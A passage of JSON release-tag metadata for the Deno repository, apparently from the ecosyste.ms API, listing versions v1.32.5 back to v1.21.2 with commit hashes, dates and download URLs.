oad_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/release